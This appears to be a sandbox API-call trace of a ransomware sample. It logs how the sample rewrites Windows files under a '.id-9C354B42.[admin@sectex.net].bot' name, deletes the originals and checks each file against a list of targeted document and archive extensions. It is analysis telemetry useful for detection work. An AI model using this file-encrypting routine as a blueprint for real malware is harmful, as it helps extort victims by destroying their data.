	[0048.146] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0048.808] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=123956) returned 1
	[0048.816] CloseHandle (hObject=0x1d0) returned 1
	[0048.859] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm")) returned 0x20
	[0048.859] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.859] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0048.859] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.859] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.860] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0048.860] GetLastError () returned 0x0
	[0048.860] ReadFile (in: hFile=0x1d0, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x1e434, lpOverlapped=0x0) returned 1
	[0048.863] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x1e440, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x1e440, lpOverlapped=0x0) returned 1
	[0048.866] ReadFile (in: hFile=0x1d0, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0048.866] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0048.866] SetEndOfFile (hFile=0x184) returned 1
	[0048.866] CloseHandle (hObject=0x184) returned 1
	[0048.866] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.866] SetEndOfFile (hFile=0x1d0) returned 1
	[0048.868] CloseHandle (hObject=0x1d0) returned 1
	[0048.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0048.868] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm")) returned 1
	[0048.868] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70
	[0048.868] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70
	[0048.868] lstrlenW (lpString=".doc") returned 4
	[0048.868] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0048.868] lstrlenW (lpString=".docx") returned 5
	[0048.868] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1
	[0048.868] lstrlenW (lpString=".pdf") returned 4
	[0048.868] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0048.868] lstrlenW (lpString=".xls") returned 4
	[0048.868] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0048.868] lstrlenW (lpString=".xlsx") returned 5
	[0048.868] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1
	[0048.868] lstrlenW (lpString=".ppt") returned 4
	[0048.868] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0048.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70
	[0048.869] lstrlenW (lpString=".zip") returned 4
	[0048.869] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0048.869] lstrlenW (lpString=".rar") returned 4
	[0048.869] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0048.869] lstrlenW (lpString=".bz2") returned 4
	[0048.869] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0048.869] lstrlenW (lpString=".7z") returned 3
	[0048.869] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0048.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70
	[0048.869] lstrlenW (lpString=".dbf") returned 4
	[0048.869] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0048.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70
	[0048.869] lstrlenW (lpString=".1cd") returned 4
	[0048.869] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0048.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70
	[0048.869] lstrlenW (lpString=".jpg") returned 4
	[0048.869] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0048.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70
	[0048.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70
	[0048.869] lstrlenW (lpString=".doc") returned 4
	[0048.869] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0048.869] lstrlenW (lpString=".docx") returned 5
	[0048.869] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1
	[0048.869] lstrlenW (lpString=".pdf") returned 4
	[0048.869] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0048.869] lstrlenW (lpString=".xls") returned 4
	[0048.869] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0048.869] lstrlenW (lpString=".xlsx") returned 5
	[0048.869] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1
	[0048.869] lstrlenW (lpString=".ppt") returned 4
	[0048.869] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0048.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70
	[0048.869] lstrlenW (lpString=".zip") returned 4
	[0048.870] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0048.870] lstrlenW (lpString=".rar") returned 4
	[0048.870] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0048.870] lstrlenW (lpString=".bz2") returned 4
	[0048.870] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0048.870] lstrlenW (lpString=".7z") returned 3
	[0048.870] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0048.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70
	[0048.870] lstrlenW (lpString=".dbf") returned 4
	[0048.870] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0048.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70
	[0048.870] lstrlenW (lpString=".1cd") returned 4
	[0048.870] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0048.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70
	[0048.870] lstrlenW (lpString=".jpg") returned 4
	[0048.870] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0048.870] lstrcmpiW (lpString1=".MSG", lpString2=".bot") returned 1
	[0048.870] lstrlenW (lpString="FPEXT.MSG") returned 9
	[0048.870] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0048.871] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=169637) returned 1
	[0048.871] CloseHandle (hObject=0x1d0) returned 1
	[0048.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg")) returned 0x20
	[0048.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.871] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0048.871] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.871] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.871] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184
	[0048.872] GetLastError () returned 0x0
	[0048.872] ReadFile (in: hFile=0x1d0, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x296a5, lpOverlapped=0x0) returned 1
	[0048.876] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x296b0, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x296b0, lpOverlapped=0x0) returned 1
	[0048.879] ReadFile (in: hFile=0x1d0, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0048.879] WriteFile (in: hFile=0x184, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0048.879] SetEndOfFile (hFile=0x184) returned 1
	[0048.879] CloseHandle (hObject=0x184) returned 1
	[0048.880] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0048.880] SetEndOfFile (hFile=0x1d0) returned 1
	[0048.882] CloseHandle (hObject=0x1d0) returned 1
	[0048.882] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0048.882] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG" (normalized: "c:\\program files\\common files\\microsoft shared\\web server extensions\\14\\bin\\1033\\fpext.msg")) returned 1
	[0048.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90
	[0048.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90
	[0048.883] lstrlenW (lpString=".doc") returned 4
	[0048.883] lstrcmpiW (lpString1=".doc", lpString2=".MSG") returned -1
	[0048.883] lstrlenW (lpString=".docx") returned 5
	[0048.883] lstrcmpiW (lpString1=".docx", lpString2="T.MSG") returned -1
	[0048.883] lstrlenW (lpString=".pdf") returned 4
	[0048.883] lstrcmpiW (lpString1=".pdf", lpString2=".MSG") returned 1
	[0048.883] lstrlenW (lpString=".xls") returned 4
	[0048.883] lstrcmpiW (lpString1=".xls", lpString2=".MSG") returned 1
	[0048.883] lstrlenW (lpString=".xlsx") returned 5
	[0048.883] lstrcmpiW (lpString1=".xlsx", lpString2="T.MSG") returned -1
	[0048.883] lstrlenW (lpString=".ppt") returned 4
	[0048.883] lstrcmpiW (lpString1=".ppt", lpString2=".MSG") returned 1
	[0048.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90
	[0048.883] lstrlenW (lpString=".zip") returned 4
	[0048.883] lstrcmpiW (lpString1=".zip", lpString2=".MSG") returned 1
	[0048.883] lstrlenW (lpString=".rar") returned 4
	[0048.883] lstrcmpiW (lpString1=".rar", lpString2=".MSG") returned 1
	[0048.883] lstrlenW (lpString=".bz2") returned 4
	[0048.883] lstrcmpiW (lpString1=".bz2", lpString2=".MSG") returned -1
	[0048.883] lstrlenW (lpString=".7z") returned 3
	[0048.883] lstrcmpiW (lpString1=".7z", lpString2="MSG") returned -1
	[0048.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90
	[0048.883] lstrlenW (lpString=".dbf") returned 4
	[0048.883] lstrcmpiW (lpString1=".dbf", lpString2=".MSG") returned -1
	[0048.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90
	[0048.883] lstrlenW (lpString=".1cd") returned 4
	[0048.883] lstrcmpiW (lpString1=".1cd", lpString2=".MSG") returned -1
	[0048.883] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90
	[0048.883] lstrlenW (lpString=".jpg") returned 4
	[0048.884] lstrcmpiW (lpString1=".jpg", lpString2=".MSG") returned -1
	[0048.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90
	[0048.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90
	[0048.884] lstrlenW (lpString=".doc") returned 4
	[0048.884] lstrcmpiW (lpString1=".doc", lpString2=".MSG") returned -1
	[0048.884] lstrlenW (lpString=".docx") returned 5
	[0048.884] lstrcmpiW (lpString1=".docx", lpString2="T.MSG") returned -1
	[0048.884] lstrlenW (lpString=".pdf") returned 4
	[0048.884] lstrcmpiW (lpString1=".pdf", lpString2=".MSG") returned 1
	[0048.884] lstrlenW (lpString=".xls") returned 4
	[0048.884] lstrcmpiW (lpString1=".xls", lpString2=".MSG") returned 1
	[0048.884] lstrlenW (lpString=".xlsx") returned 5
	[0048.884] lstrcmpiW (lpString1=".xlsx", lpString2="T.MSG") returned -1
	[0048.884] lstrlenW (lpString=".ppt") returned 4
	[0048.884] lstrcmpiW (lpString1=".ppt", lpString2=".MSG") returned 1
	[0048.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90
	[0048.884] lstrlenW (lpString=".zip") returned 4
	[0048.884] lstrcmpiW (lpString1=".zip", lpString2=".MSG") returned 1
	[0048.884] lstrlenW (lpString=".rar") returned 4
	[0048.884] lstrcmpiW (lpString1=".rar", lpString2=".MSG") returned 1
	[0048.884] lstrlenW (lpString=".bz2") returned 4
	[0048.884] lstrcmpiW (lpString1=".bz2", lpString2=".MSG") returned -1
	[0048.884] lstrlenW (lpString=".7z") returned 3
	[0048.884] lstrcmpiW (lpString1=".7z", lpString2="MSG") returned -1
	[0048.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90
	[0048.884] lstrlenW (lpString=".dbf") returned 4
	[0048.884] lstrcmpiW (lpString1=".dbf", lpString2=".MSG") returned -1
	[0048.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90
	[0048.884] lstrlenW (lpString=".1cd") returned 4
	[0048.884] lstrcmpiW (lpString1=".1cd", lpString2=".MSG") returned -1
	[0048.884] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\14\\BIN\\1033\\FPEXT.MSG") returned 90
	[0048.884] lstrlenW (lpString=".jpg") returned 4
	[0048.884] lstrcmpiW (lpString1=".jpg", lpString2=".MSG") returned -1
	[0048.885] lstrcmpiW (lpString1=".bmp", lpString2=".bot") returned -1
	[0048.885] lstrlenW (lpString="verisign.bmp") returned 12
	[0048.885] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0048.886] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=2702) returned 1
	[0048.886] CloseHandle (hObject=0x1d0) returned 1
	[0048.886] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp")) returned 0x20
	[0048.886] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\services\\verisign.bmp.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.886] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0048.886] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51
	[0048.886] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51
	[0048.886] lstrlenW (lpString=".doc") returned 4
	[0048.886] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1
	[0048.886] lstrlenW (lpString=".docx") returned 5
	[0048.886] lstrcmpiW (lpString1=".docx", lpString2="n.bmp") returned -1
	[0048.886] lstrlenW (lpString=".pdf") returned 4
	[0048.886] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1
	[0048.886] lstrlenW (lpString=".xls") returned 4
	[0048.886] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1
	[0048.886] lstrlenW (lpString=".xlsx") returned 5
	[0048.886] lstrcmpiW (lpString1=".xlsx", lpString2="n.bmp") returned -1
	[0048.886] lstrlenW (lpString=".ppt") returned 4
	[0048.887] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1
	[0048.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51
	[0048.887] lstrlenW (lpString=".zip") returned 4
	[0048.887] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1
	[0048.887] lstrlenW (lpString=".rar") returned 4
	[0048.887] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1
	[0048.887] lstrlenW (lpString=".bz2") returned 4
	[0048.887] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1
	[0048.887] lstrlenW (lpString=".7z") returned 3
	[0048.887] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1
	[0048.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51
	[0048.887] lstrlenW (lpString=".dbf") returned 4
	[0048.887] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1
	[0048.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51
	[0048.887] lstrlenW (lpString=".1cd") returned 4
	[0048.887] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1
	[0048.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51
	[0048.887] lstrlenW (lpString=".jpg") returned 4
	[0048.887] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1
	[0048.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51
	[0048.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51
	[0048.887] lstrlenW (lpString=".doc") returned 4
	[0048.887] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1
	[0048.887] lstrlenW (lpString=".docx") returned 5
	[0048.887] lstrcmpiW (lpString1=".docx", lpString2="n.bmp") returned -1
	[0048.887] lstrlenW (lpString=".pdf") returned 4
	[0048.887] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1
	[0048.887] lstrlenW (lpString=".xls") returned 4
	[0048.887] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1
	[0048.887] lstrlenW (lpString=".xlsx") returned 5
	[0048.887] lstrcmpiW (lpString1=".xlsx", lpString2="n.bmp") returned -1
	[0048.887] lstrlenW (lpString=".ppt") returned 4
	[0048.887] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1
	[0048.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51
	[0048.887] lstrlenW (lpString=".zip") returned 4
	[0048.888] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1
	[0048.888] lstrlenW (lpString=".rar") returned 4
	[0048.888] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1
	[0048.888] lstrlenW (lpString=".bz2") returned 4
	[0048.888] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1
	[0048.888] lstrlenW (lpString=".7z") returned 3
	[0048.888] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1
	[0048.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51
	[0048.888] lstrlenW (lpString=".dbf") returned 4
	[0048.888] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1
	[0048.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51
	[0048.888] lstrlenW (lpString=".1cd") returned 4
	[0048.888] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1
	[0048.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 51
	[0048.888] lstrlenW (lpString=".jpg") returned 4
	[0048.888] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1
	[0048.888] lstrcmpiW (lpString1=".inc", lpString2=".bot") returned 1
	[0048.888] lstrlenW (lpString="adojavas.inc") returned 12
	[0048.888] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0048.890] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=14610) returned 1
	[0048.890] CloseHandle (hObject=0x1d0) returned 1
	[0048.890] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc")) returned 0x20
	[0048.890] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0048.890] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0048.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53
	[0048.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53
	[0048.890] lstrlenW (lpString=".doc") returned 4
	[0048.890] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1
	[0048.890] lstrlenW (lpString=".docx") returned 5
	[0048.890] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1
	[0048.890] lstrlenW (lpString=".pdf") returned 4
	[0048.890] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1
	[0048.890] lstrlenW (lpString=".xls") returned 4
	[0048.890] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1
	[0048.890] lstrlenW (lpString=".xlsx") returned 5
	[0048.890] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1
	[0048.890] lstrlenW (lpString=".ppt") returned 4
	[0048.890] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1
	[0048.890] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 53
	[0048.890] lstrlenW (lpString=".zip") returned 4
	[0048.890] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1
	[0048.890] lstrlenW (lpString=".rar") returned 4
	[0048.890] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1
	[0048.891] lstrlenW (lpString=".bz2") returned 4
	[0048.891] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1
	[0048.891] lstrlenW (lpString=".7z") returned 3
	[0048.891] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1
